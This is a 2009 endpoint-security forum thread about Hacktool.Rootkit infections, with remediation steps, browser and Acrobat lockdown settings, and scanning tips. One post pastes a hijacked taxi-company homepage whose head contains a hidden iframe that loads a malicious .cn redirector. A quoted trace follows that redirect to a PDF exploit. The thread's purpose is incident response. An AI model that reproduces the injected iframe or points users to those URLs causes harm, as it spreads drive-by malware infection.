Endpoint Protection

I have seen this come up an awful lot in my environment in the past few weeks. Symantec classifies this a "very low" severity, but when you read the summary, they state "All files that are detected as Hacktool.Rootkit should be deleted. Infected systems may need to be restored from backups or patched to restore security".

That sounds pretty severe to me. Especially considering the amount of systems that I am seeing. These are being detected and thrown into quarantine but my threat count has gone through the roof.

Does anyone have experience dealing with this threat?

Thanks

What is the exact path of the infection? Knowing the entry point of the virus in the hard drive could provide information.

You need to know what rootkits in general do: "A rootkit is a software system that consists of a program or combination of several programs designed to hide or obscure the fact that a system has been compromised."

But if Symantec defines it as a software that grants administrator or root access to someone. Then it should be dealt with immediately.

The serverity would probably mean the amount of damage it can do to a network. Maybe infection rate is added in the equation.

You need to patch up if this has already spread through your network. Know all the ports it uses to access external PCs.

this may help: http://www.symantec.com/security_response/severityassessment.jsp

of note though will be that we are getting more generic with our detections, hence the name "Hacktool.Rootkit" so we perhaps need to look again at the severity for these

We had a user find one today, it made an executable with his user name as the file name, thought that was an interesting touch. Appears to be Russian by the script and file contents. Symantec detected the sys file in the c:/windows/system32/drivers folderand deleted it but I had to do the hard work myself. It seems to be attempting to create a virtual drive or emulate a USB drive for some reason.

Timestamp: 05/21/09 09:45:40
Input URL: http://www.orangecab.net
Web server IPv4 address: 68.180.151.74
***###Received Web Page text begins after this line###***
HTTP/1.0 200 OK
Date: Thu, 21 May 2009 16:45:52 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Content-Type: text/html
Age: 2
Server: YTS/1.17.13

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Orange Cab</title>
</head><iframe src="http://namebrandmart.cn/in.cgi?income18" width=1 height=1 style="visibility: hidden"></iframe>

<body bgcolor="#F49F6C" style="margin:0px">
<link href="stylesheet.css" type="text/css" rel="stylesheet">

<table align="center" width="779" bgcolor="#F38C47" border="0" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
<tr>
<td valign="top">
<img src="images/r1-1.gif" />
</td>

<td valign="top">

<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7,0,19,0" width="535" height="105">
<param name="movie" value="man.swf" />
<param name="quality" value="high" />
<embed src="man.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="535" height="105"></embed>
</object>
</object> </td>
</tr>
</table>
<table align="center" width="779" height="35" border="1" background="images/tab_bg.jpg" bordercolor="#FFFFCC" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
<tr>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="index.php">Home</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="registration.php">Registration</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="http://192.9.210.172:8081" target="_blank">Booking/Reservation</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="service_rate.php">&nbsp;&nbsp;&nbsp;Rates&nbsp;&nbsp;&nbsp;</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="about_us.php">About Us</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="helpful_hints.php">Helpful Hints</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="service.php">Service</a></font></td>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:15px; font-weight:bold"><a href="contact_us.php">Contact us</a></font></td>

</tr>
</table>

<table align="center" width="779" border="3" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
<tr>
<td valign="top"><img src="images/all_cabs.jpg" /></td>
</tr>


</table>

<table align="center" width="779" border="1" bgcolor="#F38C47" bordercolor="#FFFFCC" cellspacing="9" cellpadding="3" style="border-collapse:collapse">
<tr>
<td>

<table align="center" width="100%" border="0" bgcolor="#F38C47" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
<tr>
<td width="50%" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="4">
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:20px; font-weight:bold">For Dispatch Service Call:</font> </td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">(206)957-0866 Seattle</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">(206)957-0866 East Side</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">(206)957-0866 South King County</font></td>
</tr>
</table>

</td>

<td width="50%" valign="top">
<table width="100%" border="0" cellspacing="4" cellpadding="4">
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:20px; font-weight:bold">We are in service 24/7 and provide:</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500"> - Airport service</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">- Package Deliveries</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">- Time calls</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">- Corporate Accounts</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">- School Runs</font></td>
</tr>
<tr>
<td><font color="#462714" style="font-family:Arial; font-size:18px; font-weight:500">- Contract rates upon written</font></td>
</tr>
</table>

</td>
</tr>
</table>


</td>
</tr>

</table>

<table align="center" width="779" border="1" bgcolor="#F38C47" cellspacing="3" cellpadding="3" style="border-collapse:collapse">
<tr>
<td valign="top">
<img src="images/head2.gif" />
</td>

<td>
<img src="images/head6.gif" />
</td>

</tr>
</table>


<table align="center" width="779" border="1" bgcolor="#F38C47" bordercolor="#FFFFCC" cellspacing="4" cellpadding="4" style="border-collapse:collapse">
<tr>
<td width="50%" valign="top" align="center">

<img src="images/bottom.jpg" />
</td>

<td align="center">
<font color="#462714" style="font-family:Arial; font-size:12px; font-weight:bold">We accept</font> <br />
<img src="images/cards.gif" />
</td>
</tr>
</table>


<table align="center" width="779" border="1" bordercolor="#CCFFFF" bgcolor="#BDB188" cellspacing="0" cellpadding="0" style="border-collapse:collapse">
<tr>
<td align="center"><font color="#462714" style="font-family:Arial; font-size:12px; font-weight:bold"><a href="http://www.orangecab.net/" target="_blank">All rights reserved: Orange Cab Company Inc. Oct/2008</a></font></td>
</tr>
</table>



</body>
</html>

we aslso faced this problem earlier; but after putting rapidrelease definitions in place symantec was able to remove the virus

I checked the websites. orangecab.net seems legitimate.
I  didn't find any useful info on namebrandmart.cn but I'm thinking that it has malicious code in it and the other website - orangecab.net is hijacked.

From: http://ask.metafilter.com/117620/Have-I-suffered-a-PDF-exploit
"
I tried to visit the web site of a local business, and a PDF was automatically and unexpectedly downloaded. What was it trying to do, and how can I know whether I avoided the exploit?


The web site was orangecab dot net, and its hompeage contains an extraneous seeming iframe for namebrandmart dot cn, with filename in.cgi?income18. Following that with wget as follows (replacing "." with " dot " as necessary)


$ wget http://namebrandmart dot cn/in.cgi?income18
--11:06:12-- http://namebrandmart dot cn/in.cgi?income18
Resolving namebrandmart dot cn... 94.247.3.150
Connecting to namebrandmart dot cn|94.247.3.150|:80... connected.
HTTP request sent, awaiting response... 302 Found
Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
Cookie coming from namebrandmart dot cn attempted to set domain to mmcounter dot com
Location: http://freewebhostguide dot com/index.php [following]

That file, in turn, contains an iframe for cache/readme.pdf. That caused Acrobat Reader to stall, but I tried to kill it as quickly as possible. Using Acrobat Reader 8.1.1/WinXPSP2.

What to do now?
posted by grouse
"

I have been testing the following configuration with some success. At tleast against the PDF.Exploits.  

Run Internet Explore as a restricted user using as secure runas style application:

Example
runas /profile /env /user:domain\luser "C:\Program Files\Internet Explorer\iexplore.exe"



Lockdown IE7 or 8 Enable or Disable the following with a GPO

1. Enable -Empty Temporary Internet Files folder
when browser is closed
2. Disable -Allow installation of desktop items
3. Disable -Open windows without address or status bars
4. Disable -Launching applications and files in an IFRAME
5. Disable - Allow active scripting
6. Disbale - Allow file downloads
7. Restrict File size limits for Internet zone to 32kb
8. Restrict File Download for Internet Explorer Processes


Lockdown Adobe Acrobat 9.01 Enable or Disable the following

1. Enable Enhanced Security
2. Uncheck “Display PDF in browser”
3. Uncheck “Allow fast webview”
4. Uncheck “Allow speculative downloading in the background”
5. Uncheck “Enable Acrobat JavaScript”

It might be detecting just ones of the rootkits from a bunch make sure there no more rootkits that got installed on your system.
Scan your system using Microsoft Sysinternals --Rootkit Revealer or ICe Sword.
If any more rootkits found submit them to symantec security response.

Once you are compromised never be 100% confident on any Antivirus software ( no antivirus is 100% safe) check it yourself there might someother rootkits that is acting as a downloader for other rootkits.
Scan with Latest Virus Defs and Rootkit Revealer.

as far as the rootkit is concerned my past experience says symantec is best solution. . .

Hello Friends,

I am new to this forum and new to this idiot virus as well.
I faced this virus last week when I was in US and due to this , I had to sparemy weekend in the removal of this.

I am currently using SYMANTEC ENDPOINT PROTECTION (corporate virus protection).

This virus comes from an infected file or link ( generally sent by one who'sID has already been attacked once). One more interesting things , I found that , this virus attacks where IE(internet Explorer) is used at most.

So after googling around for the whole day and trying so many things I came to the following solution , which I think will work for you all as well:

1. First of all restart your system in SAFE MODE and then Turn Off All the System Restores by going through My Computer--> Properties --> System Restore --> Turn Off System Restore for all drives.

2. Make all the folders and sub folders(hidden and unhidden ones) viewable.

3. Check for the C:\Documents & Settings and Check for each of the sub -folders even the hidden ones. Since , this virus is used to hack password , therefore , it generally makes a folder in this cirectory only.

4. There you will find some suspicious file , which will have a link at the desktop and in the task bar as well. This can be judged by looking which icon is this using in task bar. Delete that folder.

5. Then.run the antivirus on ur system.
6.. Download the Malwarebytes Anti-Malware from http://malwarebytes.org/ since this virus creates registry entry as well.

7. Then restart the system in normal mode with System Restore off. 

8. Execute the Malware Byte  and scan the whole system It is pretty fast and will do all the scanning within few miutes and will ask to remove and repair the infected registries. Allow it.

9. Then execute the Anti-virus on ur machine in full mode and leave that. T

8. Turn the System Restore ON and restart your system.

Hopefully , this will remove this nostalgic virus from your system. It has worked for me.

Boy, are you in for a surprise! Gmer is excellent against high level rootkits, otherwise use Malware Bytes or A-squared Anti Malware.

Greetings.

I have run into hacktool.rootkit (generically speaking), and two things seem apparent.

Infection seems to require nothing more than directing a browser to an URL...user action beyond simply going to a site does not seem to be required.  The version I encountered appears to use cache/readme.pdf and cache/flash.swf.  The URL was .cn

The latest virus definitions files as at 06-17-09 had much difficulty eradicating this trojan, were only partially successful, and were not able to stop the firstname.lastname.exe file from running on boot.  Multiple scans in both safe and normal mode failed to detect and deal with it, with the safe scans reporting absolutely nothing.  Eventually, it got most of it on one of the passes.

It was only with manual extraction of registry entries, a PF file, and the .exe file that the problem seems to be solved.  Given Symantec's difficulty in reeling this one in, I think I will wipe this machine.  I simply can't trust the AV on this one, and it's just better to know for sure.

Cheers.

Yes I know that is such a hassle to do, but you make a good point. Depending on your environment, and what your machines are responsible for sometimes the only option left is to fully wipe a machine. Just wanted to point out too that sometimes it is helpful as well to submit the sample to Symantec and then download the rapid release that will soon follow. With the constant variations on threats this is another way that helps to fully eradicate certain threats. Hope everything goes well with the reinstall.

Grant-